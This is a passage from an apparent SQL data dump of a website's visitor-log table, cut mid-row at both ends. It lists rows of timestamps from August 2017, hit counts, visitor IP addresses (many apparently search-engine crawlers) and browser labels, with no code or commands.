44427,1502472550,1,1,0,0,'178.92.251.172','chrome'),(144428,1502472982,1,1,0,0,'163.172.251.217','chrome'),(144429,1502473295,1,1,0,0,'217.182.132.172','other'),(144430,1502473297,2,0,2,0,'66.249.66.80',''),(144431,1502473329,1,1,0,0,'5.45.207.64','other'),(144432,1502473391,1,0,1,0,'66.249.66.82',''),(144433,1502473452,1,1,0,0,'217.69.133.6','other'),(144434,1502473461,1,1,0,0,'51.255.65.2','other'),(144435,1502473584,1,1,0,0,'51.255.65.33','other'),(144436,1502473697,1,1,0,0,'176.97.1.114','chrome'),(144437,1502473821,1,1,0,0,'51.255.71.112','other'),(144438,1502474402,1,1,0,0,'37.73.226.132','chrome'),(144439,1502474877,1,1,0,0,'51.255.65.54','other'),(144440,1502475011,1,1,0,0,'180.76.15.161','other'),(144441,1502475118,1,1,0,0,'51.255.65.71','other'),(144442,1502475143,1,1,0,0,'51.255.71.129','other'),(144443,1502475215,1,1,0,0,'5.45.207.66','other'),(144444,1502475422,1,1,0,0,'138.68.91.2','chrome'),(144445,1502475516,1,1,0,0,'164.132.162.188','other'),(144446,1502475616,1,1,0,0,'50.195.241.86','chrome'),(144447,1502476017,1,1,0,0,'37.9.113.94','other'),(144448,1502476221,1,1,0,0,'51.255.65.77','other'),(144449,1502476360,1,1,0,0,'66.249.66.156','chrome'),(144450,1502476387,1,1,0,0,'141.8.183.5','other'),(144451,1502476423,1,1,0,0,'51.255.65.93','other'),(144452,1502476477,1,1,0,0,'91.209.11.236','other'),(144453,1502476506,1,1,0,0,'217.182.132.77','other'),(144454,1502476565,1,1,0,0,'37.73.215.67','chrome'),(144455,1502476858,1,1,0,0,'95.134.171.87','chrome'),(144456,1502476958,1,1,0,0,'8.29.198.27','other'),(144457,1502477081,1,1,0,0,'81.171.19.177','chrome'),(144458,1502477120,1,0,1,0,'66.249.66.155',''),(144459,1502477185,1,1,0,0,'164.132.162.160','other'),(144460,1502477313,4,4,0,0,'216.244.66.194','other'),(144461,1502477348,1,1,0,0,'188.42.35.176','firefox'),(144462,1502477555,1,1,0,0,'166.88.123.167','chrome'),(144463,1502477579,1,1,0,0,'51.255.65.23','other'),(144464,1502477610,1,1,0,0,'95.134.184.143','other'),(144465,1502477714,1,1,0,0,'95.133.238.200','chrome'),(144466,1502478120,1,1,0,0,'91.196.178.70','chrome'),(144467,1502478200,1,1,0,0,'178.62.99.175','msie'),(144468,1502478462,1,1,0,0,'217.182.132.24','other'),(144469,1502478879,1,1,0,0,'46.211.156.254','chrome'),(144470,1502479009,2,2,0,0,'37.73.230.250','chrome'),(144471,1502479023,1,1,0,0,'141.8.142.21','other'),(144472,1502479038,1,0,1,0,'68.180.229.59',''),(144473,1502479537,1,1,0,0,'141.8.142.45','other'),(144474,1502479599,1,1,0,0,'93.72.22.96','chrome'),(144475,1502480055,1,1,0,0,'217.182.132.175','other'),(144476,1502480319,1,1,0,0,'51.255.71.129','other'),(144477,1502480333,1,1,0,0,'164.132.162.159','other'),(144478,1502480421,1,1,0,0,'37.73.220.246','chrome'),(144479,1502480499,1,1,0,0,'141.8.142.25','other'),(144480,1502480502,1,1,0,0,'95.108.181.52','other'),(144481,1502480508,1,1,0,0,'141.8.142.45','other'),(144482,1502480512,1,1,0,0,'37.9.113.94','other'),(144483,1502480542,1,1,0,0,'51.255.65.19','other'),(144484,1502480663,1,1,0,0,'216.244.66.237','other'),(144485,1502480811,1,1,0,0,'217.182.132.190','other'),(144486,1502480918,2,0,2,0,'66.249.66.75',''),(144487,1502480955,1,0,1,0,'66.249.66.76',''),(144488,1502481002,1,1,0,0,'128.68.110.193','msie'),(144489,1502481035,1,1,0,0,'217.182.132.20','other'),(144490,1502481239,1,1,0,0,'141.8.142.43','other'),(144491,1502481259,1,1,0,0,'107.167.104.159','other'),(144492,1502481296,2,2,0,0,'192.96.206.22','chrome'),(144493,1502481561,1,1,0,0,'164.132.162.159','other'),(144494,1502481753,1,1,0,0,'51.255.65.31','other'),(144495,1502481886,1,1,0,0,'91.196.178.103','chrome'),(144496,1502482057,1,1,0,0,'5.45.207.64','other'),(144497,1502482263,1,1,0,0,'51.255.65.10','other'),(144498,1502482511,1,1,0,0,'51.255.65.59','other'),(144499,1502482568,1,1,0,0,'217.182.132.5','other'),(144500,1502482748,1,1,0,0,'217.182.132.54','other'),(144501,1502482901,1,1,0,0,'178.154.200.35','other'),(144502,1502483205,1,1,0,0,'93.72.115.97','other'),(144503,1502483262,1,1,0,0,'217.69.133.3','other'),(144504,1502483317,1,1,0,0,'137.74.207.164','other'),(144505,1502483355,1,1,0,0,'216.244.66.194','other'),(144506,1502483694,1,1,0,0,'164.132.162.158','other'),(144507,1502483758,3,3,0,0,'5.45.207.64','other'),(144508,1502483769,1,1,0,0,'91.209.11.236','other'),(144509,1502484170,1,1,0,0,'217.182.132.173','other'),(144510,1502484676,1,1,0,0,'91.196.178.71','chrome'),(144511,1502484770,1,1,0,0,'164.132.164.180','other'),(144512,1502484775,1,1,0,0,'91.196.178.104','chrome'),(144513,1502485050,1,1,0,0,'217.69.133.6','other'),(144514,1502485057,1,1,0,0,'217.69.133.4','other'),(144515,1502485122,1,1,0,0,'91.209.11.236','other'),(144516,1502485149,1,1,0,0,'51.255.71.132','other'),(144517,1502485822,1,1,0,0,'91.196.178.102','chrome'),(144518,1502485954,1,1,0,0,'213.180.203.42','other'),(144519,1502486195,1,1,0,0,'217.182.132.56','other'),(144520,1502486397,1,1,0,0,'216.244.66.194','other'),(144521,1502486403,1,1,0,0,'91.196.156.101','chrome'),(144522,1502486415,1,1,0,0,'91.189.137.192','chrome'),(144523,1502486558,1,1,0,0,'178.92.171.49','chrome'),(144524,1502486631,1,1,0,0,'217.182.132.75','other'),(144525,1502487666,1,1,0,0,'51.255.65.85','other'),(144526,1502487787,1,1,0,0,'8.29.198.26','other'),(144527,1502488063,1,1,0,0,'188.146.98.1','chrome'),(144528,1502488353,1,1,0,0,'37.55.57.47','chrome'),(144529,1502488441,1,1,0,0,'213.57.40.49','other'),(144530,1502488485,1,1,0,0,'207.46.13.140','other'),(144531,1502488529,1,1,0,0,'51.255.65.88','other'),(144532,1502488743,1,0,1,0,'66.249.66.74',''),(144533,1502489173,1,1,0,0,'137.74.207.108','other'),(144534,1502489371,1,1,0,0,'195.10.210.70','chrome'),(144535,1502489665,1,1,0,0,'91.209.11.236','other'),(144536,1502489853,1,1,0,0,'217.182.132.15','other'),(144537,1502489929,1,1,0,0,'217.69.133.5','other'),(144538,1502490312,3,3,0,0,'5.45.207.64','other'),(144539,1502490571,1,1,0,0,'217.69.133.203','other'),(144540,1502490670,1,1,0,0,'51.255.65.13','other'),(144541,1502490728,1,1,0,0,'51.255.65.23','other'),(144542,1502490802,1,0,1,0,'66.249.66.74',''),(144543,1502490817,1,0,1,0,'66.249.66.75',''),(144544,1502491249,1,1,0,0,'217.182.132.86','other'),(144545,1502492010,1,1,0,0,'91.196.178.133','chrome'),(144546,1502492080,1,1,0,0,'5.45.207.64','other'),(144547,1502492218,1,1,0,0,'137.74.207.101','other'),(144548,1502492395,1,1,0,0,'157.55.39.205','other'),(144549,1502492624,1,1,0,0,'51.255.65.93','other'),(144550,1502492651,1,0,1,0,'66.249.66.76',''),(144551,1502492691,2,2,0,0,'141.8.183.1','other'),(144552,1502492696,1,0,1,0,'66.249.66.74',''),(144553,1502492774,1,1,0,0,'51.255.65.54','other'),(144554,1502492821,1,1,0,0,'51.255.65.32','other'),(144555,1502493057,1,1,0,0,'217.182.132.172','other'),(144556,1502493187,1,1,0,0,'5.45.207.64','other'),(144557,1502493777,1,0,1,0,'66.249.66.155',''),(144558,1502494784,1,1,0,0,'141.8.142.21','other'),(144559,1502494884,1,1,0,0,'51.255.65.20','other'),(144560,1502495112,1,1,0,0,'5.45.207.64','other'),(144561,1502495128,1,0,1,0,'66.249.66.76',''),(144562,1502495155,1,1,0,0,'35.161.55.221','other'),(144563,1502495339,1,1,0,0,'217.182.132.96','other'),(144564,1502495651,1,1,0,0,'180.76.15.163','other'),(144565,1502496279,1,1,0,0,'51.255.65.43','other'),(144566,1502496487,1,1,0,0,'51.255.65.33','other'),(144567,1502496820,15,15,0,0,'216.244.66.194','other'),(144568,1502496849,1,1,0,0,'95.108.181.69','other'),(144569,1502497064,1,1,0,0,'95.24.142.25','chrome'),(144570,1502497160,1,1,0,0,'204.79.180.1','msie'),(144571,1502497585,1,1,0,0,'95.134.184.158','chrome'),(144572,1502497688,2,2,0,0,'158.69.254.103','other'),(144573,1502497929,1,1,0,0,'5.45.207.64','other'),(144574,1502498069,2,2,0,0,'91.209.11.236','other'),(144575,1502498501,1,1,0,0,'141.8.183.1','other'),(144576,1502498619,1,1,0,0,'8.29.198.26','other'),(144577,1502498681,1,1,0,0,'193.106.58.200','chrome'),(144578,1502498787,1,1,0,0,'141.8.142.21','other'),(144579,1502499816,1,1,0,0,'217.69.133.194','other'),(144580,1502499820,1,1,0,0,'5.228.23.152','msie'),(144581,1502500597,1,1,0,0,'217.182.132.21','other'),(144582,1502500845,1,1,0,0,'107.167.109.20','other'),(144583,1502501151,1,1,0,0,'217.182.132.70','other'),(144584,1502501166,1,1,0,0,'46.188.31.243','chrome'),(144585,1502501916,1,1,0,0,'51.255.71.127','other'),(144586,1502502031,1,1,0,0,'217.182.132.174','other'),(144587,1502502129,1,1,0,0,'51.255.65.96','other'),(144588,1502502327,1,1,0,0,'91.196.178.104','chrome'),(144589,1502502452,1,1,0,0,'46.188.100.186','msie'),(144590,1502503076,1,1,0,0,'217.182.132.76','other'),(144591,1502503588,1,1,0,0,'141.8.183.1','other'),(144592,1502503592,3,3,0,0,'5.45.207.64','other'),(144593,1502503777,1,1,0,0,'217.182.132.7','other'),(144594,1502504028,1,1,0,0,'51.255.65.27','other'),(144595,1502504265,1,1,0,0,'137.74.207.109','other'),(144596,1502504505,1,0,1,0,'68.180.229.59',''),(144597,1502504648,8,8,0,0,'216.244.66.194','other'),(144598,1502504789,1,1,0,0,'217.182.132.178','other'),(144599,1502504818,1,1,0,0,'5.45.207.64','other'),(144600,1502505326,1,1,0,0,'217.182.132.54','other'),(144601,1502505636,1,1,0,0,'51.255.71.129','other'),(144602,1502505815,1,1,0,0,'5.45.207.64','other'),(144603,1502506364,1,0,1,0,'66.249.66.75',''),(144604,1502506638,1,1,0,0,'217.69.133.3','other'),(144605,1502506791,1,1,0,0,'51.255.65.86','other'),(144606,1502507105,1,1,0,0,'217.182.132.17','other'),(144607,1502507123,1,1,0,0,'217.69.133.5','other'),(144608,1502507197,1,0,1,0,'68.180.229.59',''),(144609,1502507351,1,1,0,0,'51.255.64.106','other'),(144610,1502507740,1,1,0,0,'217.182.132.92','other'),(144611,1502508252,1,0,1,0,'66.249.66.81',''),(144612,1502508540,1,1,0,0,'217.182.132.79','other'),(144613,1502508575,1,1,0,0,'217.182.132.148','other'),(144614,1502508735,1,1,0,0,'51.255.65.50','other'),(144615,1502509051,1,1,0,0,'217.182.132.29','other'),(144616,1502509299,1,1,0,0,'91.196.178.37','chrome'),(144617,1502509362,1,1,0,0,'157.55.39.153','other'),(144618,1502509449,1,1,0,0,'8.29.198.26','other'),(144619,1502509663,1,1,0,0,'141.8.183.1','other'),(144620,1502509940,1,1,0,0,'66.102.9.27','chrome'),(144621,1502509943,1,1,0,0,'157.55.39.174','other'),(144622,1502510268,1,1,0,0,'51.255.65.32','other'),(144623,1502510381,1,1,0,0,'178.94.172.158','other'),(144624,1502510580,1,0,1,0,'66.249.66.75',''),(144625,1502510627,1,1,0,0,'141.8.183.1','other'),(144626,1502510927,1,1,0,0,'217.182.132.19','other'),(144627,1502511616,1,1,0,0,'217.182.132.87','other'),(144628,1502511687,1,1,0,0,'217.182.132.173','other'),(144629,1502511986,1,1,0,0,'207.46.13.140','other'),(144630,1502512087,1,1,0,0,'5.45.207.64','other'),(144631,1502512482,1,1,0,0,'91.196.178.67','chrome'),(144632,1502512549,1,1,0,0,'95.108.181.58','other'),(144633,1502512614,1,1,0,0,'217.69.133.3','other'),(144634,1502512622,1,1,0,0,'51.255.65.39','other'),(144635,1502512743,1,1,0,0,'217.182.132.181','other'),(144636,1502512813,1,1,0,0,'51.255.71.101','other'),(144637,1502512921,1,1,0,0,'217.182.132.62','other'),(144638,1502513347,1,1,0,0,'217.182.132.241','other'),(144639,1502513390,2,2,0,0,'141.8.183.1','other'),(144640,1502513633,1,1,0,0,'95.133.153.32','chrome'),(144641,1502513740,1,1,0,0,'157.55.39.205','other'),(144642,1502513861,1,1,0,0,'213.180.203.32','other'),(144643,1502513985,1,1,0,0,'51.255.65.81','other'),(144644,1502513990,1,1,0,0,'217.182.132.193','other'),(144645,1502514354,1,1,0,0,'141.8.183.1','other'),(144646,1502514462,2,2,0,0,'66.249.66.155','chrome'),(144647,1502514463,2,2,0,0,'95.158.49.76','chrome'),(144648,1502514706,1,1,0,0,'37.55.224.135','chrome'),(144649,1502514952,1,1,0,0,'217.182.132.185','other'),(144650,1502515007,1,1,0,0,'157.55.39.153','other'),(144651,1502515058,1,1,0,0,'5.45.207.64','other'),(144652,1502515253,1,1,0,0,'51.255.71.100','other'),(144653,1502515325,1,1,0,0,'91.196.178.162','chrome'),(144654,1502515428,1,1,0,0,'66.249.66.156','chrome'),(144655,1502515587,6,6,0,0,'216.244.66.194','other'),(144656,1502515838,1,1,0,0,'5.9.155.37','other'),(144657,1502516008,1,1,0,0,'51.255.71.117','other'),(144658,1502516012,1,1,0,0,'66.249.66.157','chrome'),(144659,1502516424,1,1,0,0,'91.196.178.97','chrome'),(144660,1502516436,1,1,0,0,'217.69.133.2','other'),(144661,1502516618,1,1,0,0,'5.45.207.64','other'),(144662,1502516965,1,1,0,0,'141.8.183.1','other'),(144663,1502516967,1,1,0,0,'137.74.207.114','other'),(144664,1502517035,1,1,0,0,'37.73.212.185','chrome'),(144665,1502517357,5,5,0,0,'216.244.66.194','other'),(144666,1502517443,1,0,1,0,'66.249.66.76',''),(144667,1502517700,2,2,0,0,'37.54.16.139','chrome'),(144668,1502517841,1,1,0,0,'94.178.107.202','chrome'),(144669,1502518048,1,1,0,0,'51.255.65.66','other'),(144670,1502518051,1,1,0,0,'217.69.133.5','other'),(144671,1502518236,1,1,0,0,'51.255.65.34','other'),(144672,1502518656,1,1,0,0,'217.182.132.241','other'),(144673,1502518740,1,1,0,0,'66.249.66.157','chrome'),(144674,1502518814,1,1,0,0,'217.182.132.29','other'),(144675,1502519065,1,1,0,0,'207.46.13.140','other'),(144676,1502519069,1,1,0,0,'51.255.65.79','other'),(144677,1502519458,1,1,0,0,'5.45.207.64','other'),(144678,1502519526,1,1,0,0,'216.244.66.237','other'),(144679,1502520188,1,1,0,0,'141.8.183.1','other'),(144680,1502520277,1,1,0,0,'8.29.198.25','other'),(144681,1502520525,1,1,0,0,'217.182.132.24','other'),(144682,1502520618,2,2,0,0,'5.45.207.64','other'),(144683,1502520870,1,1,0,0,'51.255.65.76','other'),(144684,1502521360,1,1,0,0,'217.182.132.36','other'),(144685,1502521834,1,1,0,0,'178.255.215.94','other'),(144686,1502522011,1,1,0,0,'158.69.252.176','other'),(144687,1502522098,1,1,0,0,'217.182.132.178','other'),(144688,1502522678,1,0,1,0,'66.249.66.74',''),(144689,1502522701,1,1,0,0,'217.182.132.81','other'),(144690,1502522870,1,1,0,0,'51.255.71.127','other'),(144691,1502522949,1,1,0,0,'5.45.207.64','other'),(144692,1502523111,1,1,0,0,'217.69.133.203','other'),(144693,1502523153,1,1,0,0,'91.196.178.67','chrome'),(144694,1502523514,1,1,0,0,'204.79.180.12','msie'),(144695,1502523580,1,1,0,0,'37.115.137.13','chrome'),(144696,1502523596,1,1,0,0,'141.8.183.1','other'),(144697,1502523713,1,1,0,0,'157.55.39.153','other'),(144698,1502523749,1,1,0,0,'157.55.39.205','other'),(144699,1502523759,2,2,0,0,'78.111.189.241','other'),(144700,1502523829,1,1,0,0,'217.182.132.14','other'),(144701,1502524183,1,1,0,0,'95.67.123.90','chrome'),(144702,1502524390,1,1,0,0,'91.196.178.33','chrome'),(144703,1502524547,1,1,0,0,'204.79.180.4','msie'),(144704,1502524625,1,1,0,0,'5.45.207.64','other'),(144705,1502524791,1,1,0,0,'66.249.66.155','chrome'),(144706,1502525091,1,1,0,0,'141.8.183.1','other'),(144707,1502525460,1,1,0,0,'37.52.20.175','chrome'),(144708,1502525997,1,1,0,0,'51.255.71.98','other'),(144709,1502526549,3,3,0,0,'5.45.207.64','other'),(144710,1502526877,1,1,0,0,'51.255.71.130','other'),(144711,1502526993,1,1,0,0,'51.255.71.121','other'),(144712,1502527550,1,1,0,0,'5.45.207.64','other'),(144713,1502527603,1,1,0,0,'216.244.66.194','other'),(144714,1502527675,1,1,0,0,'91.196.178.134','chrome'),(144715,1502527686,1,1,0,0,'157.55.39.205','other'),(144716,1502528065,1,1,0,0,'217.182.132.66','other'),(144717,1502528378,1,1,0,0,'217.182.132.187','other'),(144718,1502528565,1,1,0,0,'141.8.142.25','other'),(144719,1502528604,1,1,0,0,'217.182.132.77','other'),(144720,1502528874,1,1,0,0,'91.196.178.39','chrome'),(144721,1502529135,1,1,0,0,'217.182.132.15','other'),(144722,1502529245,1,1,0,0,'37.54.16.139','chrome'),(144723,1502529330,1,1,0,0,'217.182.132.87','other'),(144724,1502529602,1,1,0,0,'51.255.71.115','other'),(144725,1502529683,1,1,0,0,'141.8.183.1','other'),(144726,1502529721,2,2,0,0,'5.45.207.64','other'),(144727,1502529753,1,1,0,0,'137.74.203.194','other'),(144728,1502529755,1,1,0,0,'51.255.65.33','other'),(144729,1502529868,1,1,0,0,'178.154.200.36','other'),(144730,1502529916,1,1,0,0,'51.255.65.72','other'),(144731,1502529934,1,0,1,0,'66.249.66.76',''),(144732,1502529947,1,1,0,0,'217.182.132.173','other'),(144733,1502529987,1,1,0,0,'77.88.209.156','chrome'),(144734,1502530277,1,1,0,0,'207.46.13.140','other'),(144735,1502530279,1,1,0,0,'37.52.19.125','chrome'),(144736,1502530670,1,1,0,0,'217.182.132.150','other'),(144737,1502530738,1,1,0,0,'217.182.132.94','other'),(144738,1502530844,1,1,0,0,'91.196.178.34','chrome'),(144739,1502530852,1,1,0,0,'51.255.65.3','other'),(144740,1502530865,1,1,0,0,'5.45.207.64','other'),(144741,1502530875,1,1,0,0,'91.209.11.236','other'),(144742,1502530928,1,1,0,0,'141.8.183.1','other'),(144743,1502531112,1,1,0,0,'8.29.198.27','other'),(144744,1502531215,1,1,0,0,'91.196.178.38','chrome'),(144745,1502531255,1,1,0,0,'51.255.65.7','other'),(144746,1502531564,1,1,0,0,'217.182.132.85','other'),(144747,1502531690,3,3,0,0,'216.244.66.194','other'),(144748,1502531868,1,1,0,0,'217.182.132.66','other'),(144749,1502531894,1,1,0,0,'217.182.132.177','other'),(144750,1502532109,1,1,0,0,'216.244.66.237','other'),(144751,1502532367,1,1,0,0,'66.249.66.157','chrome'),(144752,1502532931,1,1,0,0,'217.69.133.4','other'),(144753,1502533554,1,1,0,0,'176.31.231.10','other'),(144754,1502533789,1,0,1,0,'66.249.66.75',''),(144755,1502533859,1,1,0,0,'91.209.11.236','other'),(144756,1502533930,1,0,1,0,'68.180.229.59',''),(144757,1502534111,1,1,0,0,'51.255.71.111','other'),(144758,1502534179,1,1,0,0,'217.182.132.176','other'),(144759,1502534183,1,1,0,0,'217.69.133.6','other'),(144760,1502534189,1,1,0,0,'217.69.133.4','other'),(144761,1502534380,1,1,0,0,'5.45.207.64','other'),(144762,1502534468,1,1,0,0,'51.255.65.63','other'),(144763,1502534732,1,1,0,0,'217.69.133.5','other'),(144764,1502534869,1,1,0,0,'51.255.65.74','other'),(144765,1502534881,2,2,0,0,'91.209.11.236','other'),(144766,1502534986,1,1,0,0,'144.76.8.231','other'),(144767,1502535435,1,1,0,0,'217.182.132.152','other'),(144768,1502535600,1,1,0,0,'217.182.132.63','other'),(144769,1502536360,1,1,0,0,'5.45.207.64','other'),(144770,1502536459,1,1,0,0,'217.182.132.29','other'),(144771,1502536463,1,1,0,0,'217.182.132.175','other'),(144772,1502537036,1,1,0,0,'91.209.11.236','other'),(144773,1502537370,1,1,0,0,'5.45.207.64','other'),(144774,1502537421,1,1,0,0,'217.182.132.56','other'),(144775,1502538342,1,1,0,0,'128.69.152.114','chrome'),(144776,1502538407,1,1,0,0,'216.244.66.237','other'),(144777,1502538556,1,1,0,0,'109.63.232.29','msie'),(144778,1502538557,1,1,0,0,'176.15.176.132','msie'),(144779,1502538621,1,1,0,0,'51.255.65.67','other'),(144780,1502538767,1,1,0,0,'141.8.183.1','other'),(144781,1502538985,2,2,0,0,'216.244.66.194','other'),(144782,1502539233,1,0,1,0,'66.249.66.75',''),(144783,1502539252,1,1,0,0,'5.45.207.64','other'),(144784,1502539278,2,2,0,0,'91.209.11.236','other'),(144785,1502539478,1,1,0,0,'178.92.251.166','chrome'),(144786,1502539557,1,1,0,0,'85.115.58.180','other'),(144787,1502540120,1,1,0,0,'46.133.254.220','chrome'),(144788,1502540238,1,1,0,0,'217.69.133.9','other'),(144789,1502540321,1,1,0,0,'137.74.207.188','other'),(144790,1502540892,1,1,0,0,'54.208.102.37','other'),(144791,1502540894,1,1,0,0,'141.8.142.21','other'),(144792,1502540958,1,1,0,0,'91.196.178.72','chrome'),(144793,1502541098,1,1,0,0,'51.255.71.129','other'),(144794,1502541264,1,1,0,0,'188.146.64.125','chrome'),(144795,1502541626,1,1,0,0,'91.205.206.85','chrome'),(144796,1502541679,2,2,0,0,'5.45.207.64','other'),(144797,1502541707,1,1,0,0,'51.255.65.59','other'),(144798,1502541861,1,1,0,0,'51.255.65.15','other'),(144799,1502541944,1,1,0,0,'8.29.198.26','other'),(144800,1502541995,1,1,0,0,'217.182.132.85','other'),(144801,1502542129,1,1,0,0,'93.170.97.23','chrome'),(144802,1502542199,1,1,0,0,'217.182.132.80','other'),(144803,1502542258,1,1,0,0,'217.182.132.183','other'),(144804,1502542392,1,1,0,0,'51.255.71.133','other'),(144805,1502542544,1,1,0,0,'51.255.71.131','other'),(144806,1502543054,1,1,0,0,'46.211.122.111','chrome'),(144807,1502543099,1,1,0,0,'138.68.128.28','chrome'),(144808,1502543304,5,5,0,0,'216.244.66.194','other'),(144809,1502543520,1,1,0,0,'46.211.250.148','chrome'),(144810,1502543547,1,1,0,0,'91.196.178.134','chrome'),(144811,1502543862,1,1,0,0,'217.69.133.6','other'),(144812,1502543867,1,1,0,0,'217.182.132.175','other'),(144813,1502543960,1,1,0,0,'74.57.147.78','chrome'),(144814,1502544252,1,1,0,0,'51.255.65.80','other'),(144815,1502544592,1,1,0,0,'157.55.39.153','other'),(144816,1502544699,1,1,0,0,'141.8.183.1','other'),(144817,1502545072,1,1,0,0,'95.132.49.250','chrome'),(144818,1502545095,1,1,0,0,'5.45.207.64','other'),(144819,1502545357,1,1,0,0,'51.255.65.5','other'),(144820,1502545494,1,1,0,0,'91.196.178.129','chrome'),(144821,1502545708,1,0,1,0,'68.180.229.59',''),(144822,1502545796,2,0,2,0,'66.249.66.76',''),(144823,1502545958,1,1,0,0,'66.249.66.156','chrome'),(144824,1502546065,1,1,0,0,'93.188.36.189','chrome'),(144825,1502546129,1,0,1,0,'66.249.66.75',''),(144826,1502546271,1,1,0,0,'51.255.65.45','other'),(144827,1502546580,1,1,0,0,'157.55.39.205','other'),(144828,1502547184,1,1,0,0,'46.133.9.246','chrome'),(144829,1502547580,1,1,0,0,'66.249.66.75','chrome'),(144830,1502548366,1,1,0,0,'217.182.132.56','other'),(144831,1502548942,1,1,0,0,'91.196.178.39','other'),(144832,1502548965,1,1,0,0,'207.46.13.140','other'),(144833,1502548991,1,1,0,0,'51.255.65.9','other'),(144834,1502549008,1,1,0,0,'91.209.11.236','other'),(144835,1502549277,1,1,0,0,'141.8.142.21','other'),(144836,1502549438,2,2,0,0,'141.8.183.1','other'),(144837,1502549462,1,1,0,0,'51.255.65.5','other'),(144838,1502549701,1,1,0,0,'164.132.162.155','other'),(144839,1502549762,1,1,0,0,'192.99.203.35','other'),(144840,1502549805,1,1,0,0,'95.158.42.68','chrome'),(144841,1502550341,4,4,0,0,'216.244.66.194','other'),(144842,1502550527,1,1,0,0,'51.255.65.19','other'),(144843,1502550673,1,1,0,0,'217.69.133.9','other'),(144844,1502551234,1,1,0,0,'217.182.132.186','other'),(144845,1502551345,1,1,0,0,'51.255.65.34','other'),(144846,1502551405,1,1,0,0,'51.255.65.88','other'),(144847,1502551714,1,1,0,0,'217.182.132.76','other'),(144848,1502552040,1,1,0,0,'91.209.11.236','other'),(144849,1502552181,1,1,0,0,'217.182.132.74','other'),(144850,1502552429,1,1,0,0,'138.68.128.28','chrome'),(144851,1502552768,1,1,0,0,'8.29.198.25','other'),(144852,1502552966,1,1,0,0,'51.255.71.116','other'),(144853,1502553221,1,1,0,0,'217.182.132.77','other'),(144854,1502553311,1,1,0,0,'51.255.65.89','other'),(144855,1502553425,1,1,0,0,'217.182.132.97','other'),(144856,1502553645,1,1,0,0,'217.182.132.64','other'),(144857,1502554079,1,1,0,0,'51.255.65.87','other'),(144858,1502554212,1,1,0,0,'51.255.71.130','other'),(144859,1502554385,1,1,0,0,'164.132.162.188','other'),(144860,1502554479,1,1,0,0,'51.255.65.43','other'),(144861,1502554655,1,0,1,0,'66.249.66.75',''),(144862,1502554893,1,1,0,0,'91.209.11.236','other'),(144863,1502555555,1,1,0,0,'5.45.207.64','other'),(144864,1502556068,1,1,0,0,'141.8.142.21','other'),(144865,1502556473,1,0,1,0,'66.249.66.74',''),(144866,1502556863,1,1,0,0,'217.69.133.203','other'),(144867,1502557136,1,1,0,0,'217.182.132.17','other'),(144868,1502557445,1,1,0,0,'5.45.207.64','other'),(144869,1502557584,1,1,0,0,'217.182.132.78','other'),(144870,1502558822,1,1,0,0,'91.196.178.40','chrome'),(144871,1502560042,1,1,0,0,'51.255.65.37','other'),(144872,1502560304,1,1,0,0,'137.74.207.109','other'),(144873,1502560740,1,1,0,0,'217.182.132.35','other'),(144874,1502561152,1,1,0,0,'217.182.132.67','other'),(144875,1502561278,1,1,0,0,'66.249.66.156','chrome'),(144876,1502561490,1,0,1,0,'66.249.75.15',''),(144877,1502562101,1,1,0,0,'51.255.71.115','other'),(144878,1502562349,1,1,0,0,'217.182.132.188','other'),(144879,1502562973,1,1,0,0,'37.55.56.141','chrome'),(144880,1502562997,1,1,0,0,'91.209.11.236','other'),(144881,1502563599,1,1,0,0,'8.29.198.25','other'),(144882,1502563634,1,1,0,0,'40.77.167.60','other'),(144883,1502564006,1,1,0,0,'5.45.207.64','other'),(144884,1502564145,5,5,0,0,'216.244.66.194','other'),(144885,1502564286,1,1,0,0,'35.184.189.105','other'),(144886,1502564287,1,1,0,0,'51.255.65.3','other'),(144887,1502564357,1,1,0,0,'141.8.183.1','other'),(144888,1502564609,1,1,0,0,'137.74.207.116','other'),(144889,1502564643,1,1,0,0,'217.182.132.58','other'),(144890,1502565154,1,1,0,0,'217.182.132.90','other'),(144891,1502565670,1,1,0,0,'51.255.65.51','other'),(144892,1502565703,1,1,0,0,'207.46.13.140','other'),(144893,1502566316,2,2,0,0,'5.45.207.64','other'),(144894,1502566342,1,1,0,0,'195.88.52.2','chrome'),(144895,1502566977,1,1,0,0,'95.135.88.14','chrome'),(144896,1502566986,1,1,0,0,'207.46.13.140','other'),(144897,1502567203,1,1,0,0,'217.69.133.3','other'),(144898,1502567262,1,1,0,0,'141.8.142.21','other'),(144899,1502567265,1,1,0,0,'141.8.183.1','other'),(144900,1502568090,1,1,0,0,'180.76.15.139','other'),(144901,1502568672,1,1,0,0,'91.196.178.70','chrome'),(144902,1502569131,1,1,0,0,'137.74.207.161','other'),(144903,1502569301,1,1,0,0,'51.255.65.78','other'),(144904,1502569349,1,1,0,0,'51.255.65.54','other'),(144905,1502569391,1,1,0,0,'141.8.142.21','other'),(144906,1502569491,9,9,0,0,'216.244.66.194','other'),(144907,1502569685,1,1,0,0,'217.182.132.56','other'),(144908,1502570174,1,1,0,0,'217.182.132.33','other'),(144909,1502570175,1,1,0,0,'5.45.207.64','other'),(144910,1502570812,1,1,0,0,'151.80.27.116','other'),(144911,1502570973,1,1,0,0,'217.182.132.85','other'),(144912,1502571629,1,1,0,0,'66.249.66.75','chrome'),(144913,1502572008,3,3,0,0,'5.45.207.64','other'),(144914,1502572323,1,1,0,0,'217.182.132.149','other'),(144915,1502572336,3,3,0,0,'216.244.66.194','other'),(144916,1502572596,1,1,0,0,'217.182.132.175','other'),(144917,1502572797,1,0,1,0,'66.249.66.75',''),(144918,1502572881,1,1,0,0,'141.8.183.1','other'),(144919,1502572891,1,1,0,0,'66.249.66.155','chrome'),(144920,1502572893,1,1,0,0,'217.182.132.18','other'),(144921,1502572949,1,1,0,0,'217.182.132.34','other'),(144922,1502573081,1,1,0,0,'51.255.65.41','other'),(144923,1502573343,1,1,0,0,'137.74.207.170','other'),(144924,1502573402,1,1,0,0,'217.69.133.9','other'),(144925,1502573540,1,1,0,0,'164.132.162.188','other'),(144926,1502574008,1,1,0,0,'51.255.71.129','other'),(144927,1502574248,1,1,0,0,'217.182.132.85','other'),(144928,1502574426,1,1,0,0,'8.29.198.27','other'),(144929,1502574444,1,1,0,0,'51.255.65.73','other'),(144930,1502575432,1,1,0,0,'157.55.39.205','other'),(144931,1502575784,1,1,0,0,'51.255.71.101','other'),(144932,1502575963,1,1,0,0,'217.182.132.97','other'),(144933,1502576028,1,1,0,0,'37.115.95.189','chrome'),(144934,1502576098,1,1,0,0,'51.255.65.40','other'),(144935,1502577060,1,1,0,0,'217.69.133.194','other'),(144936,1502577599,1,1,0,0,'141.8.183.1','other'),(144937,1502577975,1,0,1,0,'66.249.66.157',''),(144938,1502578123,1,1,0,0,'21